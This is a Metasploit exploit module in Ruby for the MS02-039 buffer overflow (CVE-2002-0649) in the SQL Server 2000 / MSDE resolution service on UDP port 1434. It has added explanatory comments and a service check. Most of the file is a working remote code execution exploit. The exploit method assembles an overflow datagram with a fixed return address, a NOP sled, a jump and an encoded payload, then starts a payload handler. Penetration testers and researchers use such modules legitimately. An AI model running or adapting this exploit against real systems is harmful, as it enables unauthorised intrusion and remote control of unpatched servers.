##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
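class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2002-0649 (MS02-039): a buffer overflow in the
  # SQL Server 2000 / MSDE Resolution Service on UDP/1434. Per the module
  # description, the trigger is a datagram starting with 0x04 followed by
  # an over-long string; that traffic shape is what a defender would look
  # for on the wire, and installs at SP3 or later are described as not
  # affected.
  Rank = GoodRanking

  include Msf::Exploit::Remote::MSSQL

  # Registers the module metadata (name, references, payload constraints,
  # single target) and the RPORT option, which defaults to the resolution
  # service port 1434.
  #
  # @param info [Hash] metadata merged by update_info before being passed
  #   to the superclass
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-039 Microsoft SQL Server Resolution Overflow',
        'Description' => %q{
          This is an exploit for the SQL Server 2000 resolution
          service buffer overflow. This overflow is triggered by
          sending a udp packet to port 1434 which starts with 0x04 and
          is followed by long string terminating with a colon and a
          number. This module should work against any vulnerable SQL
          Server 2000 or MSDE install (pre-SP3).
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2002-0649'],
          [ 'OSVDB', '4578'],
          [ 'BID', '5310'],
          [ 'MSB', 'MS02-039'],

        ],
        'Privileged' => true,
        'Payload' => {
          # 512 bytes available; bytes that must not appear in the
          # encoded payload (NUL, ':', CR/LF, '/', '\').
          'Space' => 512,
          'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          [
            'MSSQL 2000 / MSDE <= SP2',
            {
              'Platform' => 'win',
              'Ret' => 0x42b48774,
            },
          ],
        ],
        'Platform' => 'win',
        'DisclosureDate' => '2002-07-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1434)
      ]
    )
  end

  # Probes the target with the MSSQL mixin's mssql_ping and prints whatever
  # server information it reports.
  #
  # @return [Exploit::CheckCode] Detected when the ping response carries a
  #   'ServerName', Safe otherwise. Note this only shows that a resolution
  #   service answered; it does not establish that the host is unpatched.
  def check
    info = mssql_ping
    if info['ServerName']
      print_status("SQL Server Information:")
      info.each_pair do |k, v|
        # ljust pads to a 15-column key field; the former
        # " " * (15 - k.length) raised ArgumentError for keys longer
        # than 15 characters.
        print_status(" #{k.ljust(15)} = #{v}")
      end
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  # Builds the single UDP datagram described in the module metadata and
  # sends it to RPORT, then hands control to the payload handler.
  # connect_udp/udp_sock/disconnect_udp/handler, rand_text_english and
  # make_nops are framework helpers; rand_text_english is presumably
  # generating filler that excludes payload_badchars — confirm in the
  # mixin.
  def exploit
    connect_udp
    print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
    print_status("Execute 'net start sqlserveragent' once access is obtained")

    # \x68:888 => push dword 0x3838383a
    buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

    # Return to the stack pointer
    buf[97, 4] = [target.ret].pack('V')

    # Which lands right here
    buf[101, 6] = make_nops(6)

    # Jumps 8 bytes ahead
    buf[107, 2] = "\xeb\x08"

    # Write to thread storage space to avoid a crash
    buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

    # And finally into the payload
    buf[117, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    disconnect_udp
    handler
  end
end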